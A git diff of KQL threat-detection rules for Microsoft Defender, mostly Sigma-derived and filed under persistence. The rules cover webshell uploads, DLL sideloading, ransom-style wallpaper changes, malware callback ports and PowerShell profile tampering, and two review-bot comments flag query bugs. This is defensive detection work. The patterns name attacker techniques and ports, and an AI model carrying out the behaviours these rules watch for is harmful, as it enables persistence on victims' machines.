 | where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql b/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql
index 3edd1ca6..397ebdfd 100644
--- a/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql
+++ b/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql
@@ -1,12 +1,12 @@
-// Title: Potential Webshell Creation On Static Website
-// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
-// Date: 2019-10-22
-// Level: medium
-// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.003
-// False Positives:
-// - Legitimate administrator or developer creating legitimate executable files in a web application folder
-
-DeviceFileEvents
+// Title: Potential Webshell Creation On Static Website
+// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
+// Date: 2019-10-22
+// Level: medium
+// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+// - Legitimate administrator or developer creating legitimate executable files in a web application folder
+
+DeviceFileEvents
 | where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql b/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql
index 0c027af5..cdc912b1 100644
--- a/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql
@@ -1,10 +1,10 @@
-// Title: Potential WWlib.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-05-18
-// Level: medium
-// Description: Detects potential DLL sideloading of "wwlib.dll"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Potential WWlib.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects potential DLL sideloading of "wwlib.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql b/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql
index d746f12d..8d07fe60 100644
--- a/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql
+++ b/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Child Process of KeyScrambler.exe
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-05-13
-// Level: medium
-// Description: Detects potentially suspicious child processes of KeyScrambler.exe
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1203, attack.t1574.001
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Child Process of KeyScrambler.exe
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-05-13
+// Level: medium
+// Description: Detects potentially suspicious child processes of KeyScrambler.exe
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1203, attack.t1574.001
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql
index 1b55b96f..41d7f565 100644
--- a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql
+++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql
@@ -1,13 +1,13 @@
-// Title: Potentially Suspicious Desktop Background Change Using Reg.EXE
-// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023-12-21
-// Level: medium
-// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
-// This is a common technique used by malware to change the desktop background to a ransom note or other image.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
-// False Positives:
-// - Administrative scripts that change the desktop background to a company logo or other image.
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Desktop Background Change Using Reg.EXE
+// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
+// This is a common technique used by malware to change the desktop background to a ransom note or other image.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
+// False Positives:
+// - Administrative scripts that change the desktop background to a company logo or other image.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql
index cc991980..95eb3ee2 100644
--- a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql
+++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql
@@ -1,13 +1,13 @@
-// Title: Potentially Suspicious Desktop Background Change Via Registry
-// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023-12-21
-// Level: medium
-// Description: Detects registry value settings that would replace the user's desktop background.
-// This is a common technique used by malware to change the desktop background to a ransom note or other image.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
-// False Positives:
-// - Administrative scripts that change the desktop background to a company logo or other image.
-
-DeviceRegistryEvents
+// Title: Potentially Suspicious Desktop Background Change Via Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects registry value settings that would replace the user's desktop background.
+// This is a common technique used by malware to change the desktop background to a ransom note or other image.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
+// False Positives:
+// - Administrative scripts that change the desktop background to a company logo or other image.
+
+DeviceRegistryEvents
 | where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(((RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper") or InitiatingProcessFolderPath endswith "C:\\Windows\\Explorer.EXE" or InitiatingProcessFolderPath endswith "\\svchost.exe"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Amazon\\EC2Launch\\EC2Launch.exe", "C:\\Program Files (x86)\\Amazon\\EC2Launch\\EC2Launch.exe")) and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql
index e0f8d060..fcaa16fc 100644
--- a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql
+++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql
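Review bot: The value comparisons on the new `| where` line use Sysmon's rendered strings (`RegistryValueData =~ "DWORD (0x00000001)"` and `RegistryValueData =~ "(Empty)"`), whereas DeviceRegistryEvents reports the raw value data, so the NoChangingWallpaper branch is unlikely ever to match and the empty-Wallpaper exclusion is unlikely ever to apply; only the `RegistryKey endswith "\\Wallpaper"` branch does real work. `RegistryValueData =~ "1"` and `isempty(RegistryValueData)` are the equivalents to verify against live data. The enclosing hunk starts on the previous line.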
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Malware Callback Communication
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-03-19
-// Level: high
-// Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.command-and-control, attack.t1571
-
-DeviceNetworkEvents
+// Title: Potentially Suspicious Malware Callback Communication
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
 | where (RemotePort in~ ("100", "198", "200", "243", "473", "666", "700", "743", "777", "1443", "1515", "1777", "1817", "1904", "1960", "2443", "2448", "3360", "3675", "3939", "4040", "4433", "4438", "4443", "4444", "4455", "5445", "5552", "5649", "6625", "7210", "7777", "8143", "8843", "9631", "9943", "10101", "12102", "12103", "12322", "13145", "13394", "13504", "13505", "13506", "13507", "14102", "14103", "14154", "49180", "65520", "65535")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
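Review bot: The private-range exclusion on the new `| where` line passes IPv6 prefixes (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`) to `ipv4_is_in_range`, which cannot parse them and returns null, so IPv6 loopback, link-local and ULA destinations are never excluded while the IPv4 ones are; those three checks should use `ipv6_is_in_range(RemoteIP, ...)` or `ipv6_is_match`. `RemotePort in~ ("100", "198", ...)` also compares a numeric column with string literals and relies on implicit conversion (or fails outright, depending on the engine); `RemotePort in (100, 198, ...)` is the unambiguous form. The Linux variant in the next hunk repeats both issues with the same IPv6 prefixes and a string port list.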
diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql
index 6b9b71f8..b0f448d3 100644
--- a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql
+++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Malware Callback Communication - Linux
-// Author: hasselj
-// Date: 2024-05-10
-// Level: high
-// Description: Detects programs that connect to known malware callback ports based on threat intelligence reports.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.command-and-control, attack.t1571
-
-DeviceNetworkEvents
+// Title: Potentially Suspicious Malware Callback Communication - Linux
+// Author: hasselj
+// Date: 2024-05-10
+// Level: high
+// Description: Detects programs that connect to known malware callback ports based on threat intelligence reports.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
 | where (RemotePort in~ ("888", "999", "2200", "2222", "4000", "4444", "6789", "8531", "50501", "51820")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql b/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql
index 354f302d..70d9d6b1 100644
--- a/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql
+++ b/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql
@@ -1,13 +1,13 @@
-// Title: Potentially Suspicious Shell Script Creation in Profile Folder
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-06-02
-// Level: low
-// Description: Detects the creation of shell scripts under the "profile.d" path.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.
-// - Regular file creation during system update or software installation by the package manager
-
-DeviceFileEvents
+// Title: Potentially Suspicious Shell Script Creation in Profile Folder
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects the creation of shell scripts under the "profile.d" path.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.
+// - Regular file creation during system update or software installation by the package manager
+
+DeviceFileEvents
 | where FolderPath contains "/etc/profile.d/" and (FolderPath endswith ".csh" or FolderPath endswith ".sh")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/powershell_module_file_created.kql b/KQL/rules/Persistence/powershell_module_file_created.kql
index 9c246782..05104f54 100644
--- a/KQL/rules/Persistence/powershell_module_file_created.kql
+++ b/KQL/rules/Persistence/powershell_module_file_created.kql
@@ -1,12 +1,12 @@
-// Title: PowerShell Module File Created
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-09
-// Level: low
-// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Likely
-
-DeviceFileEvents
+// Title: PowerShell Module File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: low
+// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Likely
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql b/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql
index 5c33c3aa..0fc8d086 100644
--- a/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql
+++ b/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell Module File Created By Non-PowerShell Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-09
-// Level: medium
-// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-
-DeviceFileEvents
+// Title: PowerShell Module File Created By Non-PowerShell Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: medium
+// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceFileEvents
 | where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/powershell_profile_modification.kql b/KQL/rules/Persistence/powershell_profile_modification.kql
index 42f5f1c1..0971aa8c 100644
--- a/KQL/rules/Persistence/powershell_profile_modification.kql
+++ b/KQL/rules/Persistence/powershell_profile_modification.kql
@@ -1,12 +1,12 @@
-// Title: PowerShell Profile Modification
-// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-24
-// Level: medium
-// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013
-// False Positives:
-// - System administrator creating Powershell profile manually
-
-DeviceFileEvents
+// Title: PowerShell Profile Modification
+// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013
+// False Positives:
+// - System administrator creating Powershell profile manually
+
+DeviceFileEvents
 | where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql b/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql
index e12598f0..258befc7 100644
--- a/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql
+++ b/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql
@@ -1,12 +1,12 @@
-// Title: PowerShell Script Dropped Via PowerShell.EXE
-// Author: frack113
-// Date: 2023-05-09
-// Level: low
-// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
-
-DeviceFileEvents
+// Title: PowerShell Script Dropped Via PowerShell.EXE
+// Author: frack113
+// Date: 2023-05-09
+// Level: low
+// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
+
+DeviceFileEvents
 | where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql
index 65577a7d..4fbb64c8 100644
--- a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql
+++ b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql
@@ -1,13 +1,13 @@
-// Title: Process Explorer Driver Creation By Non-Sysinternals Binary
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023-05-05
-// Level: high
-// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
-// Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
-// False Positives:
-// - Some false positives may occur with legitimate renamed process explorer binaries
-
-DeviceFileEvents
+// Title: Process Explorer Driver Creation By Non-Sysinternals Binary
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
+// Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
+// False Positives:
+// - Some false positives may occur with legitimate renamed process explorer binaries
+
+DeviceFileEvents
 | where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql
index 12cfd2b6..aca6fe50 100644
--- a/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql
+++ b/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql
@@ -1,12 +1,12 @@
-// Title: Process Monitor Driver Creation By Non-Sysinternals Binary
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-05
-// Level: medium
-// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
-// False Positives:
-// - Some false positives may occur with legitimate renamed process monitor binaries
-
-DeviceFileEvents
+// Title: Process Monitor Driver Creation By Non-Sysinternals Binary
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
+// False Positives:
+// - Some false positives may occur with legitimate renamed process monitor binaries
+
+DeviceFileEvents
 | where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/pua_system_informer_execution.kql b/KQL/rules/Persistence/pua_system_informer_execution.kql
index 47ec5b70..d2f4d415 100644
--- a/KQL/rules/Persistence/pua_system_informer_execution.kql
+++ b/KQL/rules/Persistence/pua_system_informer_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - System Informer Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023-05-08
-// Level: medium
-// Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.discovery, attack.defense-evasion, attack.t1082, attack.t1564, attack.t1543
-// False Positives:
-// - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly
-
-DeviceProcessEvents
+// Title: PUA - System Informer Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-08
+// Level: medium
+// Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.discovery, attack.defense-evasion, attack.t1082, attack.t1564, attack.t1543
+// False Positives:
+// - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly
+
+DeviceProcessEvents
 | where FolderPath endswith "\\SystemInformer.exe" or ProcessVersionInfoOriginalFileName =~ "SystemInformer.exe" or ProcessVersionInfoFileDescription =~ "System Informer" or ProcessVersionInfoProductName =~ "System Informer" or (MD5 startswith "19426363A37C03C3ED6FEDF57B6696EC" or SHA1 startswith "8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC" or SHA256 startswith "8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql b/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql
index b3972ec5..44c1247a 100644
--- a/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql
+++ b/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql
@@ -1,10 +1,10 @@
-// Title: RedMimicry Winnti Playbook Registry Manipulation
-// Author: Alexander Rausch
-// Date: 2020-06-24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: RedMimicry Winnti Playbook Registry Manipulation
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects actions caused by the RedMimicry Winnti playbook
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/reg_add_suspicious_paths.kql b/KQL/rules/Persistence/reg_add_suspicious_paths.kql
index de19f182..c7a12c29 100644
--- a/KQL/rules/Persistence/reg_add_suspicious_paths.kql
+++ b/KQL/rules/Persistence/reg_add_suspicious_paths.kql
@@ -1,12 +1,12 @@
-// Title: Reg Add Suspicious Paths
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-19
-// Level: high
-// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562.001
-// False Positives:
-// - Rare legitimate add to registry via cli (to these locations)
-
-DeviceProcessEvents
+// Title: Reg Add Suspicious Paths
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: high
+// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562.001
+// False Positives:
+// - Rare legitimate add to registry via cli (to these locations)
+
+DeviceProcessEvents
